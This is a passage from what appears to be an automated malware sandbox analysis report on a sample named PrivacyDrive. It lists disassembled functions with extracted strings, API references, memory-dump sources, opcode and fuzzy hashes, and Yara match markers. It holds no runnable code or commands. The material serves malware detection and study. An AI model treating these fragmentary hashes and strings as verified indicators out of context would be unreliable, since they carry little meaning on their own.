Instruction Fuzzy Hash: 9051ADB4901319DFCB14CFA8C984AAEBBB5FF59350B148598E894AF355E338D900CFA5

Function 05A54390 Relevance: 5.2, Strings: 4, Instructions: 164COMMON

Download Yara Rule

Strings

4J, xrefs: 05A543F1
VG, xrefs: 05A543E3
J+*), xrefs: 05A5453F
OO, xrefs: 05A543EA

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 4J$J+*)$OO$VG
API String ID: 0-160897490
Opcode ID: 1cf24622985dc61545dc465b8d0e263a5f4e55d4b6c1f0411c2f69e6e11c090b
Instruction ID: 57bf64383a52d700685ed182a3daac3120c6437c82846cf5f18707a4bdf403cd
Opcode Fuzzy Hash: 1cf24622985dc61545dc465b8d0e263a5f4e55d4b6c1f0411c2f69e6e11c090b
Instruction Fuzzy Hash: EC5189B4901215AFCF10CFA8D984EAEBBB5FF09364B544688EC54AF345E334D940CBA5

Function 0104076F Relevance: 4.2, Strings: 3, Instructions: 482COMMON

Download Yara Rule

Strings

\^, xrefs: 01040B70
hG, xrefs: 01040B7E
4K, xrefs: 01040B77

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 4K$\^$hG
API String ID: 0-2009946656
Opcode ID: a5e6a32877c141522707734bd5b541b15a4019426f9f919a8d2443720a02dc31
Instruction ID: ad8f831180414a4d2e2570a3bb208d4cbe27cd0ffd4b16be25d7c81fa8450b11
Opcode Fuzzy Hash: a5e6a32877c141522707734bd5b541b15a4019426f9f919a8d2443720a02dc31
Instruction Fuzzy Hash: C3127BB4D002599FDB11DFA8C6806AEBBB1BF06210F544168E990BF386D7349A15CFF6

Function 05A5ED6D Relevance: 4.2, Strings: 3, Instructions: 482COMMON

Download Yara Rule

Strings

\^, xrefs: 05A5F16E
4K, xrefs: 05A5F175
hG, xrefs: 05A5F17C

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 4K$\^$hG
API String ID: 0-2009946656
Opcode ID: a2db1e67718f987b0afbc7d20d4c2885d133d736e5af4f84623ccb77446863dd
Instruction ID: 9ee1ead956c35272354ffcdfd0d8356756ed3ca53bc11e3611acf07af9cacaf6
Opcode Fuzzy Hash: a2db1e67718f987b0afbc7d20d4c2885d133d736e5af4f84623ccb77446863dd
Instruction Fuzzy Hash: 031266B4D002599FDB11DFA8C685AAEBBB1BF06210F544158E860BB386C7349A15CFF2

Function 0101A252 Relevance: 4.1, Strings: 3, Instructions: 394COMMON

Download Yara Rule

Strings

), xrefs: 0101A2D8
IEND, xrefs: 0101A6A8
), xrefs: 0101A2CE

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: b5860f4443e222c91b742957b4d88ed1901d6d30d023abc19c03a61c700b1236
Instruction ID: 1a45564b08a9d1c772a4641f56b20eadc34abe9351d09d051ed80482cf320370
Opcode Fuzzy Hash: b5860f4443e222c91b742957b4d88ed1901d6d30d023abc19c03a61c700b1236
Instruction Fuzzy Hash: A2E1A2B1A09742DFE310CF28C88475ABBE0BB98314F14892DE9D997385D779E915CBC2

Function 05A38850 Relevance: 4.1, Strings: 3, Instructions: 394COMMON

Download Yara Rule

Strings

), xrefs: 05A388CC
), xrefs: 05A388D6
IEND, xrefs: 05A38CA6

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 24329203204c7f7b4476420ac7b07b5bf48202eea672c70ea0f1b941dc187ee7
Instruction ID: eb3b3f7a70bec3e0c168d76c18e3f84049b403dc74eb05e5e2d07ae8928f5535
Opcode Fuzzy Hash: 24329203204c7f7b4476420ac7b07b5bf48202eea672c70ea0f1b941dc187ee7
Instruction Fuzzy Hash: 79E101B1A097029FE310CF28D896B1ABBE1BF84318F14492DF5959B381D379E915CBD2

Function 05A66970 Relevance: 4.0, Strings: 3, Instructions: 245COMMON

Download Yara Rule

Strings

E, xrefs: 05A66B03
0, xrefs: 05A669ED
00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 05A66A86

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 0$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$E
API String ID: 0-86108233
Opcode ID: 09e5a6ff131d843b0f9da11d5451fe8787a052caf67c57ea278b0ab127ed6fdb
Instruction ID: 53d168e10f130ebd877102b7051448718f5088b0b1c88b2753b427f10bf976e6
Opcode Fuzzy Hash: 09e5a6ff131d843b0f9da11d5451fe8787a052caf67c57ea278b0ab127ed6fdb
Instruction Fuzzy Hash: 8A815A3795D6908BC318CE3C5C91779AFA35BA6234F2E836DECF58B3C1C52988068361

Function 01044215 Relevance: 4.0, Strings: 3, Instructions: 220COMMON

Download Yara Rule

Strings

`Pd#, xrefs: 01044428
Ew@u, xrefs: 01044518
a\bb, xrefs: 0104441E

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: Ew@u$`Pd#$a\bb
API String ID: 0-4211661383
Opcode ID: 97fcf0781c540df7bc95630f70ca0a892c4714cff3f8bdd37a8f63693cde1c8f
Instruction ID: 424d86bdceebb49bedf8f9722a18e6a0efa45cfa6962a5bc6a2271c629854680
Opcode Fuzzy Hash: 97fcf0781c540df7bc95630f70ca0a892c4714cff3f8bdd37a8f63693cde1c8f
Instruction Fuzzy Hash: 3E7138B0409B408AE7B18F358894BE7BBE4BF17706F4418ACD4EA9B282D739B045DF55

Function 05A62813 Relevance: 4.0, Strings: 3, Instructions: 220COMMON

Download Yara Rule

Strings

a\bb, xrefs: 05A62A1C
Ew@u, xrefs: 05A62B16
`Pd#, xrefs: 05A62A26

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: Ew@u$`Pd#$a\bb
API String ID: 0-4211661383
Opcode ID: 3c7f6dfaecd41c67628089245ac9b395158e67a7413b5d2f77506de50affa76a
Instruction ID: c3a6070d505b9cb3e2e8977b20d9b85765239105ad6b3dabdb502ab7048410f1
Opcode Fuzzy Hash: 3c7f6dfaecd41c67628089245ac9b395158e67a7413b5d2f77506de50affa76a
Instruction Fuzzy Hash: F7714674409B408AE7718F358894BE3BBE5BF1A705F84188CD4EA9B282DB39B045DF64

Function 0104429B Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

`Pd#, xrefs: 01044428
Ew@u, xrefs: 01044518
a\bb, xrefs: 0104441E

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: Ew@u$`Pd#$a\bb
API String ID: 0-4211661383
Opcode ID: 5497cf00e1c7f4d201b250281cef61bf4b5f3f90cc9809edd8b99fb97761de37
Instruction ID: af746e1c3a8accda6f3508543bd5911d30c5cad046a895d3aadeff59fb4d4b09
Opcode Fuzzy Hash: 5497cf00e1c7f4d201b250281cef61bf4b5f3f90cc9809edd8b99fb97761de37
Instruction Fuzzy Hash: 16714CB0409B808AE7B28F348894BE7BBE4BF17705F44189CD4EA9B282D739B444DF55

Function 05A62899 Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

a\bb, xrefs: 05A62A1C
Ew@u, xrefs: 05A62B16
`Pd#, xrefs: 05A62A26

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: Ew@u$`Pd#$a\bb
API String ID: 0-4211661383
Opcode ID: 6fcba805188c1d8e96cf9bb5a214c9ee6588d077fea627b5167ccd95abc7e1b5
Instruction ID: fb3fd29d3e0410d99e9f78dc5abbe58a700e16dda0c140ff45c5405067e2c125
Opcode Fuzzy Hash: 6fcba805188c1d8e96cf9bb5a214c9ee6588d077fea627b5167ccd95abc7e1b5
Instruction Fuzzy Hash: A4716974409B808AE7728F3588A4BE3BBE5BF17705F44188CD4EA9B282D739B045DF65

Function 05A6F4EE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(CF3CCD21), ref: 05A6F579

Strings

p=-u, xrefs: 05A6F4F0, 05A6F579

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: InitVariant
String ID: p=-u
API String ID: 1927566239-1720571423
Opcode ID: de5cd94884b60b6dc2e09dcee8f5f373b6256300189572b9469cfb558ecb51a1
Instruction ID: 8f967ac4dbe2e6cd2f4a97a2a7e22f12f34681cbcb1df02210a4fabdba2e38d8
Opcode Fuzzy Hash: de5cd94884b60b6dc2e09dcee8f5f373b6256300189572b9469cfb558ecb51a1
Instruction Fuzzy Hash: 3331F5B4509B00DFC7218F45E684A16BBB1FF0AB01B44994AD8AA8BB05C731F954CB95

Function 05A33890 Relevance: 2.9, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

NaN, xrefs: 05A338EE
Inf, xrefs: 05A338E7

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: Inf$NaN
API String ID: 0-3500518849
Opcode ID: a276cfe5aa0542d7682303bcfd1159ce61b6a8abb3b0109f70a61bdc1f9f8106
Instruction ID: b767155c7cf5319335f8329e3bffe36076b46da9b7a608c1678db58db186a2e6
Opcode Fuzzy Hash: a276cfe5aa0542d7682303bcfd1159ce61b6a8abb3b0109f70a61bdc1f9f8106
Instruction Fuzzy Hash: 4DD1C672A0C3019BC704CF29C881A5ABBE6FBC8754F158E2EF89997390E675DD45CB81

Function 01038582 Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

KJML, xrefs: 01038975, 0103897D
4`[b, xrefs: 010389B2

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$KJML
API String ID: 0-506811594
Opcode ID: 49bef4541083840d6fe3b84e0a2912c3208a164d8470ce24d85308c0daed85d9
Instruction ID: 90c6ff62ae65fd3ec63761ff4d00e3b81d6b5ca560130ed5603816051e9cb569
Opcode Fuzzy Hash: 49bef4541083840d6fe3b84e0a2912c3208a164d8470ce24d85308c0daed85d9
Instruction Fuzzy Hash: 62C1A1719083009BD751EF28C841A6BBBF9EF96650F08CA9EF9C597251E339D910CB63

Function 05A56B80 Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

4`[b, xrefs: 05A56FB0
KJML, xrefs: 05A56F73, 05A56F7B

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 4`[b$KJML
API String ID: 0-506811594
Opcode ID: 95e8f756d0ddc0c79fe2b7c025588d1f207398938dcce69714ddc0494efbdc87
Instruction ID: 5bf0f167c646c501ea553f9b048c6342b20a38c5d0dc01170562ada540bf2d83
Opcode Fuzzy Hash: 95e8f756d0ddc0c79fe2b7c025588d1f207398938dcce69714ddc0494efbdc87
Instruction Fuzzy Hash: 0DC1BDB1A09200ABD711EF18D951E2BBBF5FF56764F888828FCD597251E335E804CB62

Function 010445CB Relevance: 2.9, Strings: 2, Instructions: 408COMMON

Download Yara Rule

Strings

WXQc, xrefs: 010446FA
!&&[, xrefs: 010446F0

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: !&&[$WXQc
API String ID: 0-4052844589
Opcode ID: 78049f99662aa6b251ff56c3fc1b39a661398e5b484d6f58b1d8793c7c4f7970
Instruction ID: 936e4b236e56f97f347191644ed3966ebeb459af62ce3b1e574c666a9d2c347a
Opcode Fuzzy Hash: 78049f99662aa6b251ff56c3fc1b39a661398e5b484d6f58b1d8793c7c4f7970
Instruction Fuzzy Hash: 74E16CB0504B818BE761CF39C4907E7FBE1AF16305F4888ADD1EE87282DB35A449DB25

Function 05A62BC9 Relevance: 2.9, Strings: 2, Instructions: 408COMMON

Download Yara Rule

Strings

!&&[, xrefs: 05A62CEE
WXQc, xrefs: 05A62CF8

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: !&&[$WXQc
API String ID: 0-4052844589
Opcode ID: 4ed1254ce1531a8f17b57aad5dcb2cd909d5cd8a2f90b81f013183688651d5fd
Instruction ID: b2d1c65c3f5f0f0071662aced93494acdd08195ff97feddc03adb463cebfaa16
Opcode Fuzzy Hash: 4ed1254ce1531a8f17b57aad5dcb2cd909d5cd8a2f90b81f013183688651d5fd
Instruction Fuzzy Hash: 53E16C74509B818AE761CF35C494BE7FBE5BF16305F48885DD0EE8B282DB35A04ACB61

Function 01044B4C Relevance: 2.9, Strings: 2, Instructions: 377COMMON

Download Yara Rule

Strings

*xl, xrefs: 010450D3
O|~u, xrefs: 01044E40

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: *xl$O|~u
API String ID: 0-1848346505
Opcode ID: c88b0967d19ec9fb038b0c59de9c728b14258ecfa9683f78fe16d4b90403175b
Instruction ID: 6c40b7768a7a54c3338b6bf804f419920e4fbf275ff3aaa4350c498c5d103c16
Opcode Fuzzy Hash: c88b0967d19ec9fb038b0c59de9c728b14258ecfa9683f78fe16d4b90403175b
Instruction Fuzzy Hash: 4DC15EB0504B818BD7B68F3984907E3FBE1BF16304F5889ADD4EE87252DB35A449CB51

Function 05A6314A Relevance: 2.9, Strings: 2, Instructions: 377COMMON

Download Yara Rule

Strings

O|~u, xrefs: 05A6343E
*xl, xrefs: 05A636D1

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: *xl$O|~u
API String ID: 0-1848346505
Opcode ID: 13f8075cea9c18990c39c9e05214f1ec5b3b05f6bc18c47cb4ff2c2ed83a011e
Instruction ID: 27e1019316e2a5ad5e2e216621f63130af5742f7f2c7011f0476874e864abdf6
Opcode Fuzzy Hash: 13f8075cea9c18990c39c9e05214f1ec5b3b05f6bc18c47cb4ff2c2ed83a011e
Instruction Fuzzy Hash: 06C14C74508B808ADB66CF398454BE3FBE1BF16305F58885ED4EF87282DB35A44ACB51

Function 01032132 Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

mo, xrefs: 0103251A
hw, xrefs: 010321D0

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: hw$mo
API String ID: 0-3445322867
Opcode ID: baf5f684d580f0eca853645b4390ed019c1b6df073a2a1781375946658fd029b
Instruction ID: 5829e5d9210b2e5b33985364059ae3e1eb2270ed36a61acd46771f385923a32d
Opcode Fuzzy Hash: baf5f684d580f0eca853645b4390ed019c1b6df073a2a1781375946658fd029b
Instruction Fuzzy Hash: 2BB1ADB5C04289DFDF11CFD8C9806AEBFB1BF66300F648508E991AB345D7389A19CB91

Function 05A50730 Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

mo, xrefs: 05A50B18
hw, xrefs: 05A507CE

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: hw$mo
API String ID: 0-3445322867
Opcode ID: 434199799b409c0fd40b90fb25b539dca0deef183999babf23537b6b0fcc69dc
Instruction ID: 3a2239e376bcd03aa77aae211c9ea90856a0bc2b4bd60a0d0e981a1b4d13a429
Opcode Fuzzy Hash: 434199799b409c0fd40b90fb25b539dca0deef183999babf23537b6b0fcc69dc
Instruction Fuzzy Hash: 32B179B5D05289DFDF10CFD4D994AAEBFB1BF12314F548408E8A5AB345D3389A19CB90

Function 01044E18 Relevance: 2.8, Strings: 2, Instructions: 318COMMON

Download Yara Rule

Strings

*xl, xrefs: 010450D3
O|~u, xrefs: 01044E40

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: *xl$O|~u
API String ID: 0-1848346505
Opcode ID: 577b6c837811fca73f77c809d84bd0fd117b5a8032c050e789af4569c2a2cebe
Instruction ID: 61e3b7e7e99313dbc3a171f85f7f68057a1b9d616deb6ea8ddcef50e787939c3
Opcode Fuzzy Hash: 577b6c837811fca73f77c809d84bd0fd117b5a8032c050e789af4569c2a2cebe
Instruction Fuzzy Hash: 31B16DB0504B818BD7B6CF3984907E3BBE0BF16304F4888ADD4EE87282DB35A445CB51

Function 05A63419 Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

O|~u, xrefs: 05A6343E
*xl, xrefs: 05A636D1

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: *xl$O|~u
API String ID: 0-1848346505
Opcode ID: c4680d7c5eaadd37936e9f94f49ed960d5b3b615e58237e970d027ecc767714a
Instruction ID: eb6a980c84d55b2578a9ef115b2bf1e8ccd4cd6f0f00a1cfc842402ddc7e27ec
Opcode Fuzzy Hash: c4680d7c5eaadd37936e9f94f49ed960d5b3b615e58237e970d027ecc767714a
Instruction Fuzzy Hash: C5B15C74508B808EDB66CF398454BA7FBE1BF16304F54885ED4EF87282DB35A04ACB51

Function 01044E2D Relevance: 2.8, Strings: 2, Instructions: 312COMMON

Download Yara Rule

Strings

*xl, xrefs: 010450D3
O|~u, xrefs: 01044E40

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: *xl$O|~u
API String ID: 0-1848346505
Opcode ID: 8c707bc0606129a9be82ba83c5981fb8ef20d3dfafd6b3b02c99a09640b18517
Instruction ID: cd0268fd1fed6ea6ca02197cf3d359b4fb2ef1a689485f6f98f7154e04f0cbf1
Opcode Fuzzy Hash: 8c707bc0606129a9be82ba83c5981fb8ef20d3dfafd6b3b02c99a09640b18517
Instruction Fuzzy Hash: 5FB14CB0504B818BE7B68F3984907E3BBE1BF16304F5889ADD4EE87292DB35A445CB51

Function 05A6342B Relevance: 2.8, Strings: 2, Instructions: 312COMMON

Download Yara Rule

Strings

O|~u, xrefs: 05A6343E
*xl, xrefs: 05A636D1

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: *xl$O|~u
API String ID: 0-1848346505
Opcode ID: 471a084aa730b37f196ed15c131a16e6c4394e8ed0a64ee09deb08db312906ad
Instruction ID: a81cb132b750396e477598ac1c6f5b85b75e2efd1254763bb963701b959d3777
Opcode Fuzzy Hash: 471a084aa730b37f196ed15c131a16e6c4394e8ed0a64ee09deb08db312906ad
Instruction Fuzzy Hash: B1B15C74508B808EDB66CF398054BE3FBE1BF16304F54885ED4EE8B282DB35A04ACB51

Function 05A3148C Relevance: 2.8, Strings: 2, Instructions: 293COMMON

Download Yara Rule

Strings

0123456789ABCDEFXP, xrefs: 05A3148C
0123456789abcdefxp, xrefs: 05A31499

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFXP$0123456789abcdefxp
API String ID: 0-595753566
Opcode ID: 141bf609f9fb41174ea18e9f088990839a4c3cdaf323e7f95ba2cbeefd424bc7
Instruction ID: 848d599b0e91d98b6f7673683a5122c3c18bdf5ee84020c7a526ef06761dbfc5
Opcode Fuzzy Hash: 141bf609f9fb41174ea18e9f088990839a4c3cdaf323e7f95ba2cbeefd424bc7
Instruction Fuzzy Hash: 82B16475A083419FD314CF18C495B6BBBE2AFC8758F088A2DF8A997391C734D905CB92

Function 01048372 Relevance: 2.7, Strings: 2, Instructions: 245COMMON

Download Yara Rule

Strings

0, xrefs: 010483EF
E, xrefs: 01048505

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E
API String ID: 0-745826363
Opcode ID: 491512b9bf49031ff8b0e0ee3878af793a9b9e4730147123c8df0c99f1a7a5c7
Instruction ID: 758477571765232c521b888e522d61476b848e6254e56bade6f02bbfb31759b1
Opcode Fuzzy Hash: 491512b9bf49031ff8b0e0ee3878af793a9b9e4730147123c8df0c99f1a7a5c7
Instruction Fuzzy Hash: 058136B790D6904BC7159E7C58C03ADBBD25B96230F1ECB7EE8F18B3D6C529880583A1

Function 0102F6C4 Relevance: 2.6, Strings: 2, Instructions: 105COMMON

Download Yara Rule

Strings

wy, xrefs: 0102F707
su, xrefs: 0102F6FF

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: su$wy
API String ID: 0-2149426075
Opcode ID: e0b3087a266308513e2c1973b75552fd3a3b16b62fb34fa8abc87596b31110b3
Instruction ID: 722c5c308d1b3e3a1b836bac2e824092f542e81a26a16d24f5837d2b1ab10ec4
Opcode Fuzzy Hash: e0b3087a266308513e2c1973b75552fd3a3b16b62fb34fa8abc87596b31110b3
Instruction Fuzzy Hash: 703169755087518BD7709F24C891BABBBF1FF96291F14495CE5D98B3A0E7348880CF16

Function 05A4DCC2 Relevance: 2.6, Strings: 2, Instructions: 105COMMON

Download Yara Rule

Strings

wy, xrefs: 05A4DD05
su, xrefs: 05A4DCFD

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: su$wy
API String ID: 0-2149426075
Opcode ID: 2a57257401cf9dee60bd108fc6dd1aa2d8b88f868a45d95c1a0bf25176cc509f
Instruction ID: a21a25c3c7542ff7c076b5415e39579f083c33712934c22f58d9ac782085b965
Opcode Fuzzy Hash: 2a57257401cf9dee60bd108fc6dd1aa2d8b88f868a45d95c1a0bf25176cc509f
Instruction Fuzzy Hash: E83158B06097408FD7209F64C892FABB7F2FF96255F14491CE4A98B3A0E7748880CF56

Function 05A56910 Relevance: 1.7, APIs: 1, Instructions: 247comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(05A7DB80,00000000,00000001,05A7DB70), ref: 05A56939

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: c0c0ff6781e4e6160a668049fa7bbae2f12a29f110a959c07533ee95b5615f68
Instruction ID: b14723d20e2d38b73e2e1a363f00d3d3947307e772a29622d977e428c0ce1ce2
Opcode Fuzzy Hash: c0c0ff6781e4e6160a668049fa7bbae2f12a29f110a959c07533ee95b5615f68
Instruction Fuzzy Hash: 0461CDB02042049BDB209F24DC96FB673B9FF85768F448558FA86CF290E775E800C761

Function 0101E802 Relevance: 1.7, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

-, xrefs: 0101ECEF

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 1f863eb2ff6711793898b350b22309a01fa23bc04fe1ee4fea35be905d93a58b
Instruction ID: 72adc07c7c206735f9ed4a0647bde3e1f6fe9cffa54c85bb680f959d4dbd63df
Opcode Fuzzy Hash: 1f863eb2ff6711793898b350b22309a01fa23bc04fe1ee4fea35be905d93a58b
Instruction Fuzzy Hash: 6CF1C9717087418BC31ACE2DD8D026EFBE2EFC5214F18CA6DE9DA47399D63C98458B91

Function 05A3CE00 Relevance: 1.7, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

-, xrefs: 05A3D2ED

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: eb11ab6b971956d39040c6c9af0c827e7136ac1faf6d0ac4ca23585ab8e4eb21
Instruction ID: 534c70c6485454a2e1f9f9f1df7a54f70ad73b3220537051756182b8dbf004e7
Opcode Fuzzy Hash: eb11ab6b971956d39040c6c9af0c827e7136ac1faf6d0ac4ca23585ab8e4eb21
Instruction Fuzzy Hash: 32F1E47170C7418BC308CF69D8A166AFBE3AFC5218F18CA6DF4E657395D6389C058B81

Function 01015292 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

CD, xrefs: 010152F0

Memory Dump Source

